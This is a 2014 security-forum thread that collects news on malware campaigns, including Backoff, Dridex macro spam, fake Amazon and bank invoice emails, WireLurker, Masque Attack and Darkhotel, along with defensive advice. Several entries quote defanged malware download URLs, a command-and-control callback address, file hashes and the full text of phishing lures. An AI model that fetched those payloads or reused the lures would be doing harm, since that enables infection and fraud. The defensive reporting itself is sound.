Nov 5, 2014 - "... Backoff infections are still on the rise. Fortinet researchers* have recently managed to get their hands on a new Backoff variant that shows that its authors haven't been idle. This version also does not have a version number, but has been given the name Backoff ROM. Compared to the older versions, Backoff ROM disguises itself as as a media player (mplayerc.exe) instead of a Java component in the autorun registry entries... Traffic between the malware and the C&C server is also encrypted, and the way the server responds with new commands for the malware has been simplified... for whatever reason, this new Backoff version does not have keylogging capabilities. But, the researchers believe that this is only a temporary change that will be reversed in newer versions..."
* http://blog.fortinet.com/post/rom-a-new-version-of-the-backoff-pos-malware

- https://www.damballa.com/state-infections-report-q3-2014/
10/24/2014
> https://www.damballa.com/wp-content/uploads/2014/10/soi-q3-2014.jpg

- http://atlas.arbor.net/briefs/index#1351521298
Elevated Severity
6 Nov 2014
Analysis: Since approximately Sep 8, 2014, this new version of the Backoff PoS malware has been classified in the ASERT malware analysis infrastructure, which contains at least three hundred distinct instances of Backoff... Easily compromised systems proliferate, and weak remote access deployments are often the culprit. Among the more difficult to compromise systems, tactics such as spear phishing, vendor compromise, partner attacks featuring lateral movement and other strategies well-known to more dedicated threat actors are bearing fruit for the attackers. Proper isolation, hardening, and monitoring of PoS deployments and associated infrastructure are crucial to reducing risks and detecting attackers that may already be present. PoS is squarely in the sights of many threat actors which means that organizations running PoS and their support infrastructure must realize that they are a target...
Source: http://www.net-security.org/malware_news.php?id=2906
___

Banking Trojan DRIDEX uses Macros for Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/
Nov 5, 2013 - "... DRIDEX arrives via spammed messages. The messages, supposedly sent by legitimate companies, talk about matters related to finance. The attachments are often said to be invoices or accounting documents.
Sample spammed message
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex1.png
The attachment is a Word document containing the malicious macro code. Should the user open the document, they might see a blank document. We have seen other attachments stating that the content will not be visible unless the macro feature is enabled — which is disabled by default. Once this feature is enabled, the macro downloads DRIDEX malware:
Malicious attachment instructing users to enable the macro feature:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex2.png
It then performs information theft through methods like form grabbing, screenshots, and site injections... Attacks using exploit kits rely on vulnerabilities in order to be successful. If the affected system is not vulnerable, the attack will not be successful. Meanwhile, macros are commonly used in automated and interactive documents. If the macro feature was already enabled prior to the attack, the attack commences without any additional requirements. Otherwise, the attack must use a strong social engineering lure in order to convince the user to enable the feature. The reliance on social engineering could be seen as one advantage of macro spam. In exploit kit spam, if the system is no longer vulnerable, the possibility of a successful attack dwindles to nothing, even if it was able to trick the user into click the malicious link. In a macro spam attack, there is always that possibility that the user will be tricked into enabling the macro feature...
Top affected countries, based on data from September-October 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex4.jpg
We traced the spam sending to several countries. The top ten spam sending countries include Vietnam, India, Taiwan, Korea, and China.
Top DRIDEX spam sending countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/dridex5.jpg
... best to make sure to enable the macro security features* in Office applications. For organizations, IT administrators can enforce such security measures via Group Policy settings..."
* https://office.microsoft.com/en-us/visio-help/about-macro-security-levels-HP001049689.aspx
___

'Free' Netflix Accounts: Good Luck With That...
- https://blog.malwarebytes.org/fraud-scam/2014/11/sites-offering-free-netflix-accounts-good-luck-with-that/
Nov 5, 2014 - "We’ve seen a number of Netflix themed websites which claim to offer up accounts / logins for fans of TV and movie streaming to get their fix -without- having to register or -pay- up to use the service...
1) freenetflixaccount(dot)info
This one is rather cookie-cutter and claims to have lots of accounts up for grab, linking to numerous “Netflix premium account” URLs further down the page.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx1.jpg?w=564
However, all of the live links lead to the same survey page:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx4.jpg
To get your hands on the supposed account credentials, you’d have to fill in an offer or sign up to whatever happens to be presented to you. Am I sensing an incoming theme here?…
2) freenetflixaccountasap(dot)com
This website has the visitor play an extremely long-winded and elaborate game of “click the thing”, distracting them with lots of options to choose from in order to watch some movies.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx5.jpg
... According to the text underneath the many scrolling blue bars, they claim to log you into an account from your chosen region via proxy, set up a bunch of options then log you out. They then “upload the account details” to Fileice, and ask the visitor to “Click below to download the login details”.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx12.jpg
... > https://blog.malwarebytes.org/wp-content/uploads/2014/11/nflx13.jpg
... Interesting to note that the “newly created” page has an entry on VirusTotal* from just over a week ago... Always be wary when presented with supposedly free accounts – remember that there’s something in it for the person offering them up, and it could be anything from survey scam affiliate cash and fakeouts to phishing and Malware attacks..."
* https://www.virustotal.com/en/url/d7d219b5549e7159b0722596750bcdbe6345eb39af17d24105735a03fd345e95/analysis/
___

E-ZPass SPAM/Phish ...
- http://www.networkworld.com/article/2842773/security0/have-e-zpass-watch-out-for-slimy-asprox-based-malware-ploy.html
Nov 3, 2014 - "The Internet Crime Complaint Center* today said it has gotten more than 560 complaints about a rip-off using the E-ZPass vehicle toll collection system that uses phishing techniques to deliver malware to your computer. E-ZPass is an association of 26 toll agencies in 15 states that operate the E-ZPass toll collection program..."
* https://www.ic3.gov/media/2014/141103.aspx
"... The IC3 has received more than 560 complaints in which a victim receives an e-mail stating they have not paid their toll bill. The e-mail gives instructions to download the invoice by using the link provided, but the -link- is actually a .zip file that contains an executable with location aware malware. Some of the command and control server locations are associated with the ASProx botnet..."

- http://stopmalvertising.com/spam-scams/e-zpass-themed-emails-lead-to-asprox.html
9 July 2014
Screenshot: http://stopmalvertising.com/research/images/ezpass-asprox.jpg
___

20 million new strains of malware - Q3 2014
- http://www.pandasecurity.com/mediacenter/malware/over-20-million-new-strains-of-malware-were-indentified-in-q3-2014/
Oct 31, 2014 - "... some 20 million new strains were created worldwide in the third quarter of the year, at a rate of 227,747 new samples every day. Similarly, the global infection ratio was 37.93%, slightly up on the previous quarter (36.87%)... Trojans are still the most common type of malware (78.08%). A long way behind in second place come viruses (8.89), followed by worms (3.92%)... Trojans also accounted for most infections during this period, some 75% of the total, compared with 62.80% in the previous quarter. PUPs are still in second place, responsible for 14.55% of all infections, which is down on the second quarter figure of 24.77. These are followed by adware/spyware (6.88%), worms (2.09%), and viruses (1.48)..."

:mad: :fear:

AplusWebMaster
2014-11-06, 14:20
FYI...

Fake Amazon SPAM - Word doc malware
- http://blog.mxlab.eu/2014/11/06/w97mdownloader-t-threat-attached-as-word-file-to-fake-emails-from-amazon-regarding-dispatched-order/
Nov 6, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Amazon .co.uk order has dispatched (#203-2083868-0173124)”. This email is sent from the spoofed address “Amazon .co.uk” <auto-shipping@ amazon .co.uk>” and has the following body:
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit: http ://www.amazon .co.uk/your-account
Your order #203-2083868-0173124 (received November 5, 2014)
Your right to cancel:
At Amazon .co.uk we want you to be delighted every time you shop with us. O=
ccasionally though, we know you may want to return items. Read more about o=
ur Returns Policy at: http ://www.amazon .co.uk/returns-policy/
Further, under the United Kingdom’s Distance Selling Regulations, you have =
the right to cancel the contract for the purchase of any of these items wit=
hin a period of 7 working days... If you’ve explored the above links but still need to get in touch with us, = you will find more contact details at the online Help Desk.=20
Note: this e-mail was sent from a notification-only e-mail address that can= not accept incoming e-mail.
Please do not reply to this message.=20
Thank you for shopping at Amazon .co.uk

The attached file has the name Mail Attachment.doc and is approx. 230 kB large file. The malicious Word file is detected as W97M/Downloader.t, W97M.DownLoader.110 or W97M.Dropper.Obfus. At the time of writing, 4 of the 54 AV engines did detect the malicious file at Virus Total*..."
* https://www.virustotal.com/en/file/99077f53365f931bddb4028793f9722c25b7095ae61eae3f6b31f9d7225e8c27/analysis/1415272790/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
- https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/
___

Fake 'Order' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/successfull_order-032574522-word-doc-malware/
6 Nov 2014 - "An email saying 'This is a notice that the invoice has been generated on 05.11.2014' pretending to come from random names at random companies with a subject of 'Successfull_Order 032574522' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear Customer, [redacted]
This is a notice that the invoice has been generated on 05.11.2014.
Your payment method is: credit card.
The order reference is 468824369.
Your credit card will be charged for 47.40 USD.
The payment and delivery information is in attached file.
Regards,
Systems Company,
Crocitto Greta

6 November 2014 : Order561104111.doc - Current Virus total detections: 6/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it... embedded malware or macro..."
* https://www.virustotal.com/en/file/d16c465aade28e04c2b5d9488f8698affccd7e7dc0bf36b3ecfa996d33bcd7f6/analysis/1415152827/
___

Fake Bank SPAM – PDF malware
- http://myonlinesecurity.co.uk/rbc-banque-royale-bank-interac-guillaume-gilnaught-fake-pdf-malware/
6 Nov 2014 - "'The Bank INTERAC to Guillaume Gilnaught was accepted' pretending to come from RBC Banque Royale < ibanking@ rbc .com > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/The-Bank-INTERAC-to-Guillaume-Gilnaught-was-accepted.png

6 November 2014: INTERAC_pmt_11062014_0345875.zip: Extracts to: INTERAC_pmt_11062014_0345875.exe
Current Virus total detections: 5/53* . This 'The Bank INTERAC to Guillaume Gilnaught was accepted" is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cf7454645f1116d370dcc1ea979bb31866600c15880f69920ba65cdf941d6ffe/analysis/1415290279/
___

Western Union Payment Confirmation Spam
- http://threattrack.tumblr.com/post/101929253328/western-union-payment-confirmation-spam
Nov 6, 2014 - "Subjects Seen:
WUBS Outgoing Payment Confirmation for SOTR4465838
Typical e-mail details:
... This is an automatically generated response: please do not reply to this e-mail. For enquiries please contact Customer Service.
Attached you will find the Outgoing Payment Confirmation for SOTR4465838. Please confirm all details are correct and notify us immediately if there are any discrepancies.
Thank you for your business!

Malicious File Name and MD5:
9574536_11062014.zip (5ED4C6DE460B2869088C523606415B4B)
9574536_11062014.exe (C8A8F049313D1C67F1BAAF338FE5EDE0)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/a0c7619e79b0504fac6a4441b0bdf838/tumblr_inline_nemiq798aI1r6pupn.png

Tagged: Western Union, Upatre
___

Apple blocks apps infected with WireLurker malware targeting iPhones and iPads
- http://www.theinquirer.net/inquirer/news/2379822/wirelurker-malware-targeting-iphones-and-ipads-via-mac-os-x
Nov 6, 2014 - "... Palo Alto Networks* discovered the malware threat that targets iPhones and iPads through Apple's Mac OS X operating system, putting an end to the age-old belief that iOS is virus-free. Apple has since responded, and said it has -blocked- third-party apps infected with the malware, which Palo Alto describes as the "biggest in scale" it has ever seen... "As always, we recommend that users download and install software from trusted sources.” Palo Alto discovered the new family of malware dubbed 'WireLurker', which is the first known malware that can attack iOS applications in a similar way to a traditional virus. Palo Alto describes the threat as heralding "a new era in malware attacking Apple's desktop and mobile platforms", and said that the malware is "the biggest in scale we have ever seen". WireLurker can attack iOS devices through Mac OS X using USB, and does so by installing third-party applications on non-jailbroken iPhones through 'enterprise provisioning'. The malware seems to be limited to China at present, where it is targeting devices via the Maiyadi App Store, a third-party Mac app store. WireLurker has been found in -467- OS X apps at Maiyadi, which Palo Alto claims have been downloaded 356,104 times so far... The firm also said that enterprises using Mac computers should ensure that mobile device traffic is routed through a threat prevention system."
* http://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/
___

Hacks devise new simplified Phishing
- http://www.darkreading.com/attacks-breaches/hackers-devise-new-simplified-phishing-method/d/d-id/1317242
Nov 5, 2014 - "... a more efficient way to get unwary online shoppers to part with their personal data and financial account information. The new technique, dubbed 'Operation Huyao' by the security researchers at Trend Micro* who discovered it, basically lessens the time and effort needed for attackers to mount a phishing campaign while also making such attacks harder to spot... only when the user actually attempts to make a purchase that the proxy program serves up a modified page that walks the victim through a checkout progress designed to extract personal information and payment card or bank account information... the phishers employed various blackhat SEO techniques to ensure that people doing specific product-related searches online were served up with results containing malicious links to the targeted store. Users who clicked on the links were then routed to the department store's website via the malicious proxy... In the first half of 2014 for instance, the median uptime for phishing attacks was 8 hours and 42 minutes, meaning that half of all phishing attackers were active for less than nine, the APWG** has noted... Even so, phishing continues to be a major problem. In the first six months of 2014, the industry group counted more than 123,700 unique phishing attacks which was the highest since the second half of 2009. A total of -756- institutions were specifically targeted in these attacks, the largest number ever during a six-month period. Of these companies -Apple- was the most phished brand."
* http://blog.trendmicro.com/trendlabs-security-intelligence/new-phishing-technique-outfoxes-site-owners-operation-huyao/

** http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___

CVE-2014-1772 – IE vuln analysis
- http://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/
Nov 5, 2014 - "... privately disclosed this vulnerability to Microsoft earlier in the year, and it had been fixed as part of the June Patch Tuesday update, as part of MS14-035*... this vulnerability was already patched some time ago... This highlights one important reason to upgrade to latest versions of software as much as possible: frequently, new techniques that make exploits more difficult are part of newer versions, making the overall security picture better..."
* https://technet.microsoft.com/en-us/library/security/ms14-035.aspx - Critical
Updated: Jun 17, 2014
V1.1 (June 17, 2014): Corrected the severity table and vulnerability information to add CVE-2014-2782 as a vulnerability addressed by this update. This is an informational change only. Customers who have already successfully installed the update do not need to take any action.
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1772 - 9.3 (HIGH)
Last revised: 06/26/2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2782 - 9.3 (HIGH)
Last revised: 06/26/2014

:mad: :fear:

AplusWebMaster
2014-11-07, 15:10
FYI...

'Dark market' websites seized in U.S., European busts - Silk Road 2.0
- http://www.reuters.com/article/2014/11/07/us-europol-cybersecurity-arrests-idUSKBN0IR0Z120141107
Nov 7, 2014
> http://s4.reutersmedia.net/resources/r/?m=02&d=20141107&t=2&i=989590213&w=580&fh=&fw=&ll=&pl=&r=LYNXMPEAA60EZ
"U.S. and European authorities on Friday announced the seizure of more than 400 secret website addresses and arrests of 16 people in a sweep targeting black markets for drugs and other illegal services. The developments were announced a day after prosecutors in New York unveiled criminal charges against the alleged operator of underground online drug marketplace Silk Road 2.0. U.S. authorities called the global sweep the largest law enforcement action to date against illegal websites operating on the so-called Tor network, which lets users communicate anonymously by masking their IP addresses... Europol, in a statement, said U.S. and European cyber crime units, in a sweep across 18 countries, had netted $1 million worth of Bitcoin, the digital currency, 180,000 euros in cash, silver, gold and narcotics. The more than 400 websites and domains seized on Thursday existed on the Tor network and were used by dozens of online marketplaces where such things as child pornography, guns and murder-for-hire could be purchased, authorities said. Sixteen people operating illegal sites were arrested in addition to the defendant in the Silk Road 2.0 case, Europol added, without specifying the charges... On Thursday, U.S. authorities said they had shut down Silk Road 2.0, a successor website to underground online drugs marketplace Silk Road. Blake Benthall, the alleged operator of Silk Road 2.0, was arrested and charged with -conspiracy- to commit drug trafficking, computer hacking, money laundering and other crimes. Troels Oerting, head of Europol's cybercrime center, said the operation knocked out a significant part of the infrastructure for illegal online drugs and weapons trade in the countries involved... The websites had complete business models, Oerting said, and displayed what they sold, including drugs, weapons, stolen credit cards..."
- http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
___

Fake invoice SPAM - malicious Word macro attachment
- http://blog.dynamoo.com/2014/11/sue-morckage-this-email-contains.html
7 Nov 2014 - "This -fake- invoice spam (all pretending to be from someone called Sue Morckage) comes with a malicious Word macro attachment.
From: Sue Morckage
Date: 7 November 2014 13:10
Subject: inovice 9232088 November
This email contains an invoice file attachment

The number in the subject is random, and attached is a document with the same format name (in this example invoice_9232088.doc). So far I have seen two attachments both with VT detection rates of 4/54 [1] [2]... which contains one of two malicious macros... which then go and download a binary from one of the following locations:
http ://ksiadzrobak .cba .pl/bin.exe > https://www.virustotal.com/en/ip-address/95.211.144.89/information/
http ://heartgate .de/bin.exe > https://www.virustotal.com/en/ip-address/81.169.145.156/information/
This binary gets copied into %TEMP%\AKETVJIJPZE.exe and it has a VirusTotal detection rate of just 1/54*, but so far automated analysis tools... are inconclusive as to what this does, however the payload is likely to be Cridex."
* https://www.virustotal.com/en/file/e479a2b6ef7098403c8e45d0d88be37856bb2301347f989a1708055d94c2227e/analysis/1415369050/

1] https://www.virustotal.com/en/file/7ce09f9a865bc889dd4737c1b3f5073d4512767d68604ea5913b59387f293844/analysis/1415365398/

2] https://www.virustotal.com/en/file/0db27aefbfae00b2658a360ec12445aabf0993fac6750b9c99b12e98bc3ebe4b/analysis/1415368736/

- http://myonlinesecurity.co.uk/sue-morckage-inovice-0394508-november-word-doc-malware/
7 Nov 2014
> https://www.virustotal.com/en/file/6ab64b9e14c7d8ad31794f36153276d8f50310e39e04a82935a573b8a0a982f1/analysis/1415372037/
___

Fake job sites ...
- http://blog.dynamoo.com/2014/11/europejobdayscom-and-other-fake-job.html
7 Nov 2014 - "This tip* from @peterkruse about a spam run pushing -fake- jobs using the domain europejobdays .com caught my eye, especially the mention of the nameservers using the stemcellcounseling.net domain. These -fake- job sites tend not to go alone, and a look a the other domains using the same namesevers comes up with a whole list of related -fake- sites... avoid**. You should be aware that the jobs on offer are actually part of some criminal enterprise such as money laundering or parcel reshipping. You can see a video that explains the parcel reshipping scam and the role of the parcel mule below:
> https://www.youtube.com/watch?v=UbSCXqL1jL4

* https://twitter.com/peterkruse/status/530628073264517120

** (Long list at the dynamoo URL at the top.)
___

Fake Tech Support website infections ...
- https://blog.malwarebytes.org/exploits-2/2014/11/tech-support-website-infects-your-computer-before-you-even-dial-in/
Nov 6, 2014 - "... Many websites that are promoted via ads on search engines or pop ups often turn out to be impostors or crooks and it doesn’t matter whether they are overseas or here in the U.S. This time around, our focus is on a company that seems to want a big piece of the U.S. market and boasts their infrastructure as being 'ahead of time technology equipment' while 'your computer issues are fixed securely'. This couldn’t be further from the truth. For some reason, looking at the site gives an impression of déjà-vu. Perhaps it is the template and stock photos typically used by many overseas tech support companies... While we shouldn’t judge a book by its cover, there is something really wrong that happens when you visit their website:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/blocked-1024x817.png
... One of the html files (a banner) contains a malicious script loading a page from a compromised website. This site contains an -iframe- with a dynamic URL that silently -redirects- the user to the Angler Exploit Kit... In this case, if your system was outdated and you had no security solution, you would have been victim of the fileless infection followed by additional malware... This drive-by infection almost seems like the perfect segue into a malware diagnostic. In fact, right from the beginning of our call, the technician already assumed our computer was infected... Sadly, the service provided by American Tech Help is not up to par either. The technicians are quick to point out errors and ‘hackers’ that have compromised your computer by simply showing the (typical) warnings displayed in the Windows Event Viewer:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/eventviewer-1024x728.png
... here’s the problem: Before browsing to their site and calling them up we had made sure our computer was fully patched. So while the site attempted to exploit our system, it never succeeded. So the technician’s report is completely -bogus- . It is quite possible that the tech support site was simply hacked because of poor security practices and that their owners aren’t aware of it. Or perhaps they don’t even care until the major browsers start blacklisting them and they see their traffic take a dive... There was a time when we could say that as long as you didn’t let scam artists take remote control of your computer, you were fine. Now the mere fact of browsing to one of their sites could be the beginning of some real troubles. It is -not- entirely surprising that such sites are dangerous to visit: they are built quickly, on the cheap and with little to no maintenance. This is just a recipe for disaster as any good website owner would tell you. For more information on tech support scams and general advice, please check out our Tech Support -Scams- resource page*."
* https://blog.malwarebytes.org/tech-support-scams/

- http://www.symantec.com/connect/blogs/when-tech-support-scams-meet-ransomlock
7 Nov 2014 - "A technical-support phone scam uses Trojan.Ransomlock.AM to lock the user’s computer and trick them into calling a technical help phone number to resolve the issue...
Top ten ransomware detections as of 11-07-14:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%202.png
Fake BSoD lock screen:
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/Ransomlock%203%20edit.png ..."

- http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

:mad: :fear:

AplusWebMaster
2014-11-10, 13:08
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/kate-williams-invoice-6330089-november-word-doc-malware/
10 Nov 2014 - "'invoice 6330089 November' pretending to come from 'Kate Williams' with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... DO NOT follow the advice they give to enable macros to see the content... Almost all of these malicious word documents appear to be -blank- when opened in protected view mode... The email looks like:

Please find attached your November invoice, we now have the facility to email invoices,
but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 6330089 Account No 5606330089.
Thanks very much
Kate Williams

10 November 2014 : invoice_6330089.doc - Current Virus total detections: 0/51*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415612495/

- http://blog.dynamoo.com/2014/11/kate-williams-invoice-8798556-november.html
10 Nov 2014 - "... the malware connecting to 84.40.9.34 (Hostway, UK)..."

1] https://www.virustotal.com/en/file/853b7d4967564242b80a649946c58b7cc3993940e69f17cd1c714f3380da520a/analysis/1415613432/

2] https://www.virustotal.com/en/file/626f380c54d2dde9ea3ae4b77d79a8a2e7ca7af118d726e8ba4c5edaf4d34462/analysis/1415613431/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
___

Fake Amazon SPAM - malware-macros
- http://net-security.org/malware_news.php?id=2912
Nov 10, 2014 - "... According to AppRiver* researchers, two distinct malware delivery campaigns impersonating e-commerce giant Amazon are currently hitting inboxes. The first one is directed at UK users, and the company has already quarantined over 600,000 of these messages. The malicious email takes the form of a 'delivery confirmation message' and carries a Word document that supposedly contains the needed information. Unfortunately for those who open the file and have -macros- enabled in Word, the action triggers the installation of a Trojan dropper that downloads additional malware aimed at harvesting login credentials for various online services, including online banking. The second campaign comes in the form of an order confirmation from Amazon .com:
> http://www.net-security.org/images/articles/amazonphish-10112014-big.jpg
... AppRiver* pointed out. Also, this campaign is less intense than the first one - the company has blocked "only" about -160,000- messages so far. The supposed 'invoice file attached' is actually a Trojan dropper that will download additional malware once the host is infected..."
* http://blog.appriver.com/2014/11/malicious-amazon-emails-aim-to-infect-holiday-shoppers
"... This is a very popular time of the year for these types of scams with so many people in shopping mode in preparation for the holidays. With many people expecting purchase confirmations and shipping confirmations with much more frequency, it increases the likelihood that people will far for this scam. Be extra cautious this holiday shopping season and if you are suspicious of unauthorized activity on your Amazon account -never- follow the link in an email such as this, go directly to the website and check your account from there."
___

'Darkhotel malware' is targeting travelling execs via hotel WiFi
- http://www.theinquirer.net/inquirer/news/2380394/darkhotel-malware-is-targeting-travelling-execs-via-hotel-wifi
Nov 10, 2014 - "... 'Darkhotel' has been targeting travelling executives via hotel WiFi for the past four years, Kaspersky has warned, and is still active today. According to the security firm, 'Darkhotel' infects hotel networks with spying software which in turn infects the computers of targeted executives as soon as they connect to the hotel WiFi network. The executives are tricked into installing the information-stealing malware by disguising it as an update for legitimate software such as Adobe Flash, Google Toolbar or Windows Messenger. The malware then searches the computer for sensitive corporate data, cached passwords and log-in credentials..."
* https://securelist.com/blog/research/66779/the-darkhotel-apt/
Nov 10, 2014
___

Home Depot drops Windows for Mac ...
- http://www.theinquirer.net/inquirer/news/2380340/home-depot-drops-windows-for-mac-os-x-after-data-hack
Nov 10 2014 - "... Home Depot is reportedly shutting out the Windows operating system in favour of the Apple alternative as the firm continues to respond to the catastrophic breach on its systems. The hardware chain has confessed in some detail about the attack on its checkout and sales systems, and admitted to losses of data that affect tens of millions of customers... The Wall Street Journal* has more information on the Home Depot hack..."
* http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282
"... hackers got into its systems last April by stealing a password from a vendor, opening a tiny hole that grew into the biggest retail-credit-card breach on record. On Thursday, the company announced the breach was worse than earlier thought. In addition to the 56 million credit-card accounts that were compromised, Home Depot now says around 53 million customer email addresses were stolen as well..."
___

'All Your iOS Apps Belong to Us' - FireEye
- http://www.fireeye.com/blog/technical/cyber-exploits/2014/11/masque-attack-all-your-ios-apps-belong-to-us.html
Nov 10, 2014 - "In July 2014, FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here:
> https://www.youtube.com/watch?feature=player_embedded&v=3VEQ-bJUhPw
We have notified Apple about this vulnerability on July 26... After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can -replace- authentic apps,such as banking and email apps, using attacker's malware through the Internet. That means the attacker can steal user's banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app's local data, which -wasn't- removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user's account directly. We have seen proofs that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves... By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from app store. Masque Attack has severe security consequences... In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/Untitled1.jpg
... Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer.
-- Mitigations: iOS users can protect themselves from Masque Attacks by following three steps:
- Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization.
- Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1(c), no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker
- When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately..."
Figure 3:
> http://www.fireeye.com/blog/wp-content/uploads/2014/11/IMG_0001.jpg

:mad: :fear:

AplusWebMaster
2014-11-11, 14:32
FYI...

Fake 'Bank Payment' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/11/nazarethcarecom-accounts-finchley-bank.html
11 Nov 2014 - "This -fake- invoice spam pretending to be from a care home in the UK comes with a malicious attachment.
From: Accounts Finchley [accounts.finchley@ nazarethcare .com]
Date: 11 November 2014 10:34
Subject: Bank Payments
Good Afternoon,
Paying in sheet attached
Regards
Sandra Whitmore
Care Home Administrator
Nazareth House
162 East End Road
East Finchley
London...
Nazareth Care Charitable Trust...

... The "from" field in an email is trivially easy to fake, as it looks like the body text may have been stolen from a compromised mailbox. Attached is a file 2014_11_07_14_09_19.doc which comes in two versions both with low VirusTotal detection rates [1] [2]. If macros are enabled then one of two macros... which then downloads a file from one of the following locations:
http ://www.grafichepilia .it/js/bin.exe
http ://dhanophan .co.th/js/bin.exe
This file gets copied to %TEMP%\HZLAFFLTDDO.exe and it has a VirusTotal detection rate of 3/53*. The Malwr report shows it phoning home to:
http ://84.40.9.34 /kPm/PQ0Zs8L.Wtg%26/thtqJJSo%2B/LsB6v/
It also drops a DLL identified by VirusTotal** as Dridex."
1] https://www.virustotal.com/en/file/ba33302cdcb892cbc57b502c88775528aefed879d7515d468faea193436e46e9/analysis/1415703941/

2] https://www.virustotal.com/en/file/0a5f29b5ec667d27d1539521514dfb079b58449065df9aefc654fb16f1b83e1d/analysis/1415703952/

* https://www.virustotal.com/en/file/4c6dc38c88226dc461faaa7583ac4e53df822c919de7033428478f803f6d9ea8/analysis/1415704632/

** https://www.virustotal.com/en/file/110f884be52e0ef66f339fa122161f8e4fa66f7cd1f4a412d6ed0cd124d3f915/analysis/1415705610/


- http://myonlinesecurity.co.uk/bank-payments-pretending-come-accounts-finchley-word-doc-malware/
11 Nov 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Accounts-Finchley.png
___

Fake 'Duplicate Payment' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duplicate-payment-received-word-doc-malware/
